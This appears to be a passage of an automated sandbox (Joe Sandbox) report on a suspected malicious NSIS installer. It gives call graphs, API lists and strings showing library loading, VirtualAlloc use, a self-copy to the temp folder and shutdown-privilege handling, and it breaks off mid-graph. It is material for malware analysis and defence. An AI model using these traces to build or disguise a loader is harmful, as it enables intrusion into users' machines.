4964->4956 5397 40149e 5398 4014ac PostQuitMessage 5397->5398 5399 4022f7 5397->5399 5398->5399 5400 401c1f 5401 402c1f 17 API calls 5400->5401 5402 401c26 5401->5402 5403 402c1f 17 API calls 5402->5403 5404 401c33 5403->5404 5405 402c41 17 API calls 5404->5405 5408 401c48 5404->5408 5405->5408 5406 401c63 5411 402c1f 17 API calls 5406->5411 5407 401caf 5412 402c41 17 API calls 5407->5412 5409 402c41 17 API calls 5408->5409 5410 401c58 5408->5410 5409->5410 5410->5406 5410->5407 5413 401c68 5411->5413 5414 401cb4 5412->5414 5415 402c1f 17 API calls 5413->5415 5416 402c41 17 API calls 5414->5416 5417 401c74 5415->5417 5418 401cbd FindWindowExW 5416->5418 5419 401c81 SendMessageTimeoutW 5417->5419 5420 401c9f SendMessageW 5417->5420 5421 401cdf 5418->5421 5419->5421 5420->5421 5422 402aa0 SendMessageW 5423 402ac5 5422->5423 5424 402aba InvalidateRect 5422->5424 5424->5423 5425 402821 5426 402827 5425->5426 5427 402ac5 5426->5427 5428 40282f FindClose 5426->5428 5428->5427 5429 4043a1 lstrlenW 5430 4043c0 5429->5430 5431 4043c2 WideCharToMultiByte 5429->5431 5430->5431 5432 404722 5433 40474e 5432->5433 5434 40475f 5432->5434 5493 405904 GetDlgItemTextW 5433->5493 5436 40476b GetDlgItem 5434->5436 5441 4047ca 5434->5441 5439 40477f 5436->5439 5437 4048ae 5442 404a5d 5437->5442 5495 405904 GetDlgItemTextW 5437->5495 5438 404759 5440 40654e 5 API calls 5438->5440 5444 404793 SetWindowTextW 5439->5444 5445 405c3a 4 API calls 5439->5445 5440->5434 5441->5437 5441->5442 5446 4062dc 17 API calls 5441->5446 5449 404298 8 API calls 5442->5449 5448 404231 18 API calls 5444->5448 5450 404789 5445->5450 5451 40483e SHBrowseForFolderW 5446->5451 5447 4048de 5452 405c97 18 API calls 5447->5452 5453 4047af 5448->5453 5454 404a71 5449->5454 5450->5444 5458 405b8f 3 API calls 5450->5458 5451->5437 5455 404856 CoTaskMemFree 5451->5455 5456 4048e4 5452->5456 5457 404231 18 API calls 5453->5457 5459 405b8f 3 API calls 5455->5459 5496 4062ba lstrcpynW 5456->5496 5460 4047bd 5457->5460 5458->5444 5461 404863 5459->5461 5494 404266 SendMessageW 5460->5494 5464 40489a SetDlgItemTextW 5461->5464 5469 4062dc 17 API calls 5461->5469 5464->5437 5465 4047c3 5467 406694 5 API calls 5465->5467 5466 4048fb 5468 406694 5 API calls 5466->5468 5467->5441 5475 404902 5468->5475 5470 404882 lstrcmpiW 5469->5470 5470->5464 5473 404893 lstrcatW 5470->5473 5471 404943 5497 4062ba lstrcpynW 5471->5497 5473->5464 5474 40494a 5476 405c3a 4 API calls 5474->5476 5475->5471 5479 405bdb 2 API calls 5475->5479 5481 40499b 5475->5481 5477 404950 GetDiskFreeSpaceW 5476->5477 5480 404974 MulDiv 5477->5480 5477->5481 5479->5475 5480->5481 5482 404a0c 5481->5482 5484 404ba7 20 API calls 5481->5484 5483 404a2f 5482->5483 5485 40140b 2 API calls 5482->5485 5498 404253 EnableWindow 5483->5498 5486 4049f9 5484->5486 5485->5483 5488 404a0e SetDlgItemTextW 5486->5488 5489 4049fe 5486->5489 5488->5482 5491 404ade 20 API calls 5489->5491 5490 404a4b 5490->5442 5492 40467b SendMessageW 5490->5492 5491->5482 5492->5442 5493->5438 5494->5465 5495->5447 5496->5466 5497->5474 5498->5490 4088 4015a3 4089 402c41 17 API calls 4088->4089 4090 4015aa SetFileAttributesW 4089->4090 4091 4015bc 4090->4091 5499 4028ad 5500 402c41 17 API calls 5499->5500 5502 4028bb 5500->5502 5501 4028d1 5504 405d8b 2 API calls 5501->5504 5502->5501 5503 402c41 17 API calls 5502->5503 5503->5501 5505 4028d7 5504->5505 5527 405db0 GetFileAttributesW CreateFileW 5505->5527 5507 4028e4 5508 4028f0 GlobalAlloc 5507->5508 5509 402987 5507->5509 5510 402909 5508->5510 5511 40297e CloseHandle 5508->5511 5512 4029a2 5509->5512 5513 40298f DeleteFileW 5509->5513 5528 403347 SetFilePointer 5510->5528 5511->5509 5513->5512 5515 40290f 5516 403331 ReadFile 5515->5516 5517 402918 GlobalAlloc 5516->5517 5518 402928 5517->5518 5519 40295c 5517->5519 5521 403116 31 API calls 5518->5521 5520 405e62 WriteFile 5519->5520 5522 402968 GlobalFree 5520->5522 5523 402935 5521->5523 5524 403116 31 API calls 5522->5524 5525 402953 GlobalFree 5523->5525 5526 40297b 5524->5526 5525->5519 5526->5511 5527->5507 5528->5515 5529 401a30 5530 402c41 17 API calls 5529->5530 5531 401a39 ExpandEnvironmentStringsW 5530->5531 5532 401a60 5531->5532 5533 401a4d 5531->5533 5533->5532 5534 401a52 lstrcmpW 5533->5534 5534->5532 5535 6f262c57 5536 6f262c6f 5535->5536 5537 6f26158f 2 API calls 5536->5537 5538 6f262c8a 5537->5538 4536 402032 4537 402044 4536->4537 4547 4020f6 4536->4547 4538 402c41 17 API calls 4537->4538 4540 40204b 4538->4540 4539 401423 24 API calls 4545 402250 4539->4545 4541 402c41 17 API calls 4540->4541 4542 402054 4541->4542 4543 40206a LoadLibraryExW 4542->4543 4544 40205c GetModuleHandleW 4542->4544 4546 40207b 4543->4546 4543->4547 4544->4543 4544->4546 4559 406703 WideCharToMultiByte 4546->4559 4547->4539 4550 4020c5 4552 405322 24 API calls 4550->4552 4551 40208c 4553 402094 4551->4553 4554 4020ab 4551->4554 4555 40209c 4552->4555 4556 401423 24 API calls 4553->4556 4562 6f261777 4554->4562 4555->4545 4557 4020e8 FreeLibrary 4555->4557 4556->4555 4557->4545 4560 40672d GetProcAddress 4559->4560 4561 402086 4559->4561 4560->4561 4561->4550 4561->4551 4563 6f2617aa 4562->4563 4604 6f261b5f 4563->4604 4565 6f2617b1 4566 6f2618d6 4565->4566 4567 6f2617c2 4565->4567 4568 6f2617c9 4565->4568 4566->4555 4654 6f262352 4567->4654 4638 6f262394 4568->4638 4573 6f26180f 4667 6f262569 4573->4667 4574 6f26182d 4577 6f261833 4574->4577 4578 6f26187e 4574->4578 4575 6f2617df 4580 6f2617e5 4575->4580 4586 6f2617f0 4575->4586 4576 6f2617f8 4587 6f2617ee 4576->4587 4664 6f262d37 4576->4664 4686 6f2615c6 4577->4686 4584 6f262569 10 API calls 4578->4584 4580->4587 4648 6f262aac 4580->4648 4590 6f26186f 4584->4590 4585 6f261815 4678 6f2615b4 4585->4678 4658 6f262724 4586->4658 4587->4573 4587->4574 4596 6f2618c5 4590->4596 4692 6f26252c 4590->4692 4593 6f2617f6 4593->4587 4594 6f262569 10 API calls 4594->4590 4596->4566 4598 6f2618cf GlobalFree 4596->4598 4598->4566 4601 6f2618b1 4601->4596 4696 6f26153d wsprintfW 4601->4696 4602 6f2618aa FreeLibrary 4602->4601 4699 6f26121b GlobalAlloc 4604->4699 4606 6f261b83 4700 6f26121b GlobalAlloc 4606->4700 4608 6f261da9 GlobalFree GlobalFree GlobalFree 4609 6f261dc6 4608->4609 4625 6f261e10 4608->4625 4610 6f262192 4609->4610 4617 6f261ddb 4609->4617 4609->4625 4612 6f2621b4 GetModuleHandleW 4610->4612 4610->4625 4611 6f261c64 GlobalAlloc 4633 6f261b8e 4611->4633 4614 6f2621c5 LoadLibraryW 4612->4614 4615 6f2621da 4612->4615 4613 6f261ccd GlobalFree 4613->4633 4614->4615 4614->4625 4707 6f26161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4615->4707 4616 6f261caf lstrcpyW 4619 6f261cb9 lstrcpyW 4616->4619 4617->4625 4703 6f26122c 4617->4703 4619->4633 4620 6f26222c 4623 6f262239 lstrlenW 4620->4623 4620->4625 4621 6f2620ec 4621->4625 4631 6f262134 lstrcpyW 4621->4631 4708 6f26161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4623->4708 4624 6f262064 4706 6f26121b GlobalAlloc 4624->4706 4625->4565 4626 6f2621ec 4626->4620 4636 6f262216 GetProcAddress 4626->4636 4629 6f261d0b 4629->4633 4701 6f26158f GlobalSize GlobalAlloc 4629->4701 4630 6f261fa5 GlobalFree 4630->4633 4631->4625 4632 6f262253 4632->4625 4633->4608 4633->4611 4633->4613 4633->4616 4633->4619 4633->4621 4633->4624 4633->4625 4633->4629 4633->4630 4635 6f26122c 2 API calls 4633->4635 4635->4633 4636->4620 4637 6f26206d 4637->4565 4640 6f2623ac 4638->4640 4639 6f26122c GlobalAlloc lstrcpynW 4639->4640 4640->4639 4642 6f2624d5 GlobalFree 4640->4642 4644 6f262454 GlobalAlloc WideCharToMultiByte 4640->4644 4645 6f26247f GlobalAlloc CLSIDFromString 4640->4645 4647 6f26249e 4640->4647 4710 6f2612ba 4640->4710 4642->4640 4643 6f2617cf 4642->4643 4643->4575 4643->4576 4643->4587 4644->4642 4645->4642 4647->4642 4714 6f2626b8 4647->4714 4649 6f262abe 4648->4649 4650 6f262b63 ReadFile 4649->4650 4653 6f262b81 4650->4653 4652 6f262c4d 4652->4587 4717 6f262a56 4653->4717 4655 6f262367 4654->4655 4656 6f262372 GlobalAlloc 4655->4656 4657 6f2617c8 4655->4657 4656->4655 4657->4568 4662 6f262754 4658->4662 4659 6f262802 4661 6f262808 GlobalSize 4659->4661 4663 6f262812 4659->4663 4660 6f2627ef GlobalAlloc 4660->4663 4661->4663 4662->4659 4662->4660 4663->4593 4665 6f262d42 4664->4665 4666 6f262d82 GlobalFree 4665->4666 4721 6f26121b GlobalAlloc 4667->4721 4669 6f26260e StringFromGUID2 4674 6f262573 4669->4674 4670 6f26261f lstrcpynW 4670->4674 4671 6f2625ec MultiByteToWideChar 4671->4674 4672 6f262656 GlobalFree 4672->4674 4673 6f262632 wsprintfW 4673->4674 4674->4669 4674->4670 4674->4671 4674->4672 4674->4673 4675 6f26268b GlobalFree 4674->4675 4676 6f261272 2 API calls 4674->4676 4722 6f2612e1 4674->4722 4675->4585 4676->4674 4726 6f26121b GlobalAlloc 4678->4726 4680 6f2615b9 4681 6f2615c6 2 API calls 4680->4681 4682 6f2615c3 4681->4682 4683 6f261272 4682->4683 4684 6f2612b5 GlobalFree 4683->4684 4685 6f26127b GlobalAlloc lstrcpynW 4683->4685 4684->4590 4685->4684 4687 6f2615d2 wsprintfW 4686->4687 4688 6f2615ff lstrcpyW 4686->4688 4691 6f261618 4687->4691 4688->4691 4691->4594 4693 6f261891 4692->4693 4694 6f26253a 4692->4694 4693->4601 4693->4602 4694->4693 4695 6f262556 GlobalFree 4694->4695 4695->4694 4697 6f261272 2 API calls 4696->4697 4698 6f26155e 4697->4698 4698->4596 4699->4606 4700->4633 4702 6f2615ad 4701->4702 4702->4629 4709 6f26121b GlobalAlloc 4703->4709 4705 6f26123b lstrcpynW 4705->4625 4706->4637 4707->4626 4708->4632 4709->4705 4711 6f2612c1 4710->4711 4712 6f26122c 2 API calls 4711->4712 4713 6f2612df 4712->4713 4713->4640 4715 6f2626c6 VirtualAlloc 4714->4715 4716 6f26271c 4714->4716 4715->4716 4716->4647 4718 6f262a61 4717->4718 4719 6f262a66 GetLastError 4718->4719 4720 6f262a71 4718->4720 4719->4720 4720->4652 4721->4674 4723 6f26130c 4722->4723 4724 6f2612ea 4722->4724 4723->4674 4724->4723 4725 6f2612f0 lstrcpyW 4724->4725 4725->4723 4726->4680 5544 6f2616d4 5545 6f261703 5544->5545 5546 6f261b5f 22 API calls 5545->5546 5547 6f26170a 5546->5547 5548 6f261711 5547->5548 5549 6f26171d 5547->5549 5550 6f261272 2 API calls 5548->5550 5551 6f261727 5549->5551 5552 6f261744 5549->5552 5560 6f26171b 5550->5560 5555 6f26153d 3 API calls 5551->5555 5553 6f26176e 5552->5553 5554 6f26174a 5552->5554 5557 6f26153d 3 API calls 5553->5557 5556 6f2615b4 3 API calls 5554->5556 5558 6f26172c 5555->5558 5559 6f26174f 5556->5559 5557->5560 5561 6f2615b4 3 API calls 5558->5561 5562 6f261272 2 API calls 5559->5562 5563 6f261732 5561->5563 5564 6f261755 GlobalFree 5562->5564 5565 6f261272 2 API calls 5563->5565 5564->5560 5566 6f261769 GlobalFree 5564->5566 5567 6f261738 GlobalFree 5565->5567 5566->5560 5567->5560 5568 402a35 5569 402c1f 17 API calls 5568->5569 5570 402a3b 5569->5570 5571 402a72 5570->5571 5572 40288b 5570->5572 5574 402a4d 5570->5574 5571->5572 5573 4062dc 17 API calls 5571->5573 5573->5572 5574->5572 5576 406201 wsprintfW 5574->5576 5576->5572 5577 401735 5578 402c41 17 API calls 5577->5578 5579 40173c SearchPathW 5578->5579 5580 4029e6 5579->5580 5581 401757 5579->5581 5581->5580 5583 4062ba lstrcpynW 5581->5583 5583->5580 5584 4014b8 5585 4014be 5584->5585 5586 401389 2 API calls 5585->5586 5587 4014c6 5586->5587 5588 401db9 GetDC 5589 402c1f 17 API calls 5588->5589 5590 401dcb GetDeviceCaps MulDiv ReleaseDC 5589->5590 5591 402c1f 17 API calls 5590->5591 5592 401dfc 5591->5592 5593 4062dc 17 API calls 5592->5593 5594 401e39 CreateFontIndirectW 5593->5594 5595 402592 5594->5595 5596 40283b 5597 402843 5596->5597 5598 402847 FindNextFileW 5597->5598 5599 402859 5597->5599 5598->5599 5600 4029e6 5599->5600 5602 4062ba lstrcpynW 5599->5602 5602->5600 5603 6f261058 5606 6f261074 5603->5606 5604 6f2610dd 5605 6f261092 5608 6f261516 GlobalFree 5605->5608 5606->5604 5606->5605 5607 6f261516 GlobalFree 5606->5607 5607->5605 5609 6f2610a2 5608->5609 5610 6f2610b2 5609->5610 5611 6f2610a9 GlobalSize 5609->5611 5612 6f2610b6 GlobalAlloc 5610->5612 5613 6f2610c7 5610->5613 5611->5610 5614 6f26153d 3 API calls 5612->5614 5615 6f2610d2 GlobalFree 5613->5615 5614->5613 5615->5604 5616 6f2618d9 5617 6f2618fc 5616->5617 5618 6f261931 GlobalFree 5617->5618 5619 6f261943 5617->5619 5618->5619 5620 6f261272 2 API calls 5619->5620 5621 6f261ace GlobalFree GlobalFree 5620->5621

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 0040338F Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410stringfilecomCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 0 40338f-4033cc SetErrorMode GetVersion 1 4033ce-4033d6 call 406694 0->1 2 4033df 0->2 1->2 7 4033d8 1->7 3 4033e4-4033f8 call 406624 lstrlenA 2->3 9 4033fa-403416 call 406694 * 3 3->9 7->2 16 403427-403486 #17 OleInitialize SHGetFileInfoW call 4062ba GetCommandLineW call 4062ba 9->16 17 403418-40341e 9->17 24 403490-4034aa call 405bbc CharNextW 16->24 25 403488-40348f 16->25 17->16 21 403420 17->21 21->16 28 4034b0-4034b6 24->28 29 4035c1-4035db GetTempPathW call 40335e 24->29 25->24 31 4034b8-4034bd 28->31 32 4034bf-4034c3 28->32 36 403633-40364d DeleteFileW call 402edd 29->36 37 4035dd-4035fb GetWindowsDirectoryW lstrcatW call 40335e 29->37 31->31 31->32 34 4034c5-4034c9 32->34 35 4034ca-4034ce 32->35 34->35 38 4034d4-4034da 35->38 39 40358d-40359a call 405bbc 35->39 57 403653-403659 36->57 58 4036fe-40370e call 4038d0 OleUninitialize 36->58 37->36 54 4035fd-40362d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40335e 37->54 40 4034f5-40352e 38->40 41 4034dc-4034e4 38->41 55 40359c-40359d 39->55 56 40359e-4035a4 39->56 47 403530-403535 40->47 48 40354b-403585 40->48 45 4034e6-4034e9 41->45 46 4034eb 41->46 45->40 45->46 46->40 47->48 52 403537-40353f 47->52 48->39 53 403587-40358b 48->53 62 403541-403544 52->62 63 403546 52->63 53->39 64 4035ac-4035ba call 4062ba 53->64 54->36 54->58 55->56 56->28 66 4035aa 56->66 59 4036ee-4036f5 call 4039aa 57->59 60 40365f-40366a call 405bbc 57->60 75 403834-40383a 58->75 76 403714-403724 call 405920 ExitProcess 58->76 74 4036fa 59->74 77 4036b8-4036c2 60->77 78 40366c-4036a1 60->78 62->48 62->63 63->48 67 4035bf 64->67 66->67 67->29 74->58 80 4038b8-4038c0 75->80 81 40383c-403852 GetCurrentProcess OpenProcessToken 75->81 85 4036c4-4036d2 call 405c97 77->85 86 40372a-40373e call 40588b lstrcatW 77->86 82 4036a3-4036a7 78->82 83 4038c2 80->83 84 4038c6-4038ca ExitProcess 80->84 88 403854-403882 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403888-403896 call 406694 81->89 90 4036b0-4036b4 82->90 91 4036a9-4036ae 82->91 83->84 85->58 101 4036d4-4036ea call 4062ba * 2 85->101 102 403740-403746 lstrcatW 86->102 103 40374b-403765 lstrcatW lstrcmpiW 86->103 88->89 99 4038a4-4038af ExitWindowsEx 89->99 100 403898-4038a2 89->100 90->82 96 4036b6 90->96 91->90 91->96 96->77 99->80 104 4038b1-4038b3 call 40140b 99->104 100->99 100->104 101->59 102->103 103->58 106 403767-40376a 103->106 104->80 107 403773 call 40586e 106->107 108 40376c-403771 call 4057f1 106->108 117 403778-403786 SetCurrentDirectoryW 107->117 108->117 118 403793-4037bc call 4062ba 117->118 119 403788-40378e call 4062ba 117->119 123 4037c1-4037dd call 4062dc DeleteFileW 118->123 119->118 126 40381e-403826 123->126 127 4037df-4037ef CopyFileW 123->127 126->123 128 403828-40382f call 406080 126->128 127->126 129 4037f1-403811 call 406080 call 4062dc call 4058a3 127->129 128->58 129->126 138 403813-40381a CloseHandle 129->138 138->126
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE ref: 004033B2
                                                                                                                                                                                                                    • GetVersion.KERNEL32 ref: 004033B8
                                                                                                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                                                                                                                                                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040342F
                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
                                                                                                                                                                                                                    • GetCommandLineW.KERNEL32(Grundlovssikrende36 Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                                                                                                                                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",00000020,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",00000000,?,00000006,00000008,0000000A), ref: 00403498
                                                                                                                                                                                                                      • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                                      • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D2
                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035EF
                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040360B
                                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403624
                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403638
                                                                                                                                                                                                                      • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Grundlovssikrende36 Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                                    • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403724
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403737
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403746
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403751
                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403779
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                                                                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004038CA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns$C:\Users\user\Desktop$C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe$Error launching installer$Grundlovssikrende36 Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                    • API String ID: 3441113951-1836278071
                                                                                                                                                                                                                    • Opcode ID: c69f0a08dcb2e1d024cd1a682ba050e32cb95b0861efa09548cea5cd73a41d6c
                                                                                                                                                                                                                    • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c69f0a08dcb2e1d024cd1a682ba050e32cb95b0861efa09548cea5cd73a41d6c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00404C9E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 139 404c9e-404cea GetDlgItem * 2 140 404cf0-404d84 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->140 141 404f0b-404f12 139->141 142 404d93-404d9a DeleteObject 140->142 143 404d86-404d91 SendMessageW 140->143 144 404f14-404f24 141->144 145 404f26 141->145 147 404d9c-404da4 142->147 143->142 146 404f29-404f32 144->146 145->146 148 404f34-404f37 146->148 149 404f3d-404f43 146->149 150 404da6-404da9 147->150 151 404dcd-404dd1 147->151 148->149 152 405021-405028 148->152 155 404f52-404f59 149->155 156 404f45-404f4c 149->156 153 404dab 150->153 154 404dae-404dcb call 4062dc SendMessageW * 2 150->154 151->147 157 404dd3-404dff call 404231 * 2 151->157 162 405099-4050a1 152->162 163 40502a-405030 152->163 153->154 154->151 159 404f5b-404f5e 155->159 160 404fce-404fd1 155->160 156->152 156->155 199 404e05-404e0b 157->199 200 404eca-404edd GetWindowLongW SetWindowLongW 157->200 168 404f60-404f67 159->168 169 404f69-404f7e call 404bec 159->169 160->152 164 404fd3-404fdd 160->164 166 4050a3-4050a9 SendMessageW 162->166 167 4050ab-4050b2 162->167 171 405281-405293 call 404298 163->171 172 405036-405040 163->172 175 404fed-404ff7 164->175 176 404fdf-404feb SendMessageW 164->176 166->167 177 4050b4-4050bb 167->177 178 4050e6-4050ed 167->178 168->160 168->169 169->160 198 404f80-404f91 169->198 172->171 173 405046-405055 SendMessageW 172->173 173->171 183 40505b-40506c SendMessageW 173->183 175->152 185 404ff9-405003 175->185 176->175 186 4050c4-4050cb 177->186 187 4050bd-4050be ImageList_Destroy 177->187 181 405243-40524a 178->181 182 4050f3-4050ff call 4011ef 178->182 181->171 193 40524c-405253 181->193 209 405101-405104 182->209 210 40510f-405112 182->210 191 405076-405078 183->191 192 40506e-405074 183->192 194 405014-40501e 185->194 195 405005-405012 185->195 196 4050d4-4050e0 186->196 197 4050cd-4050ce GlobalFree 186->197 187->186 203 405079-405092 call 401299 SendMessageW 191->203 192->191 192->203 193->171 204 405255-40527f ShowWindow GetDlgItem ShowWindow 193->204 194->152 195->152 196->178 197->196 198->160 206 404f93-404f95 198->206 201 404e0e-404e15 199->201 205 404ee3-404ee7 200->205 207 404eab-404ebe 201->207 208 404e1b-404e43 201->208 203->162 204->171 212 404f01-404f09 call 404266 205->212 213 404ee9-404efc ShowWindow call 404266 205->213 214 404f97-404f9e 206->214 215 404fa8 206->215 207->201 224 404ec4-404ec8 207->224 218 404e45-404e7b SendMessageW 208->218 219 404e7d-404e7f 208->219 221 405106 209->221 222 405107-40510a call 404c6c 209->222 225 405153-405177 call 4011ef 210->225 226 405114-40512d call 4012e2 call 401299 210->226 212->141 213->171 216 404fa0-404fa2 214->216 217 404fa4-404fa6 214->217 220 404fab-404fc7 call 40117d 215->220 216->220 217->220 218->207 230 404e81-404e90 SendMessageW 219->230 231 404e92-404ea8 SendMessageW 219->231 220->160 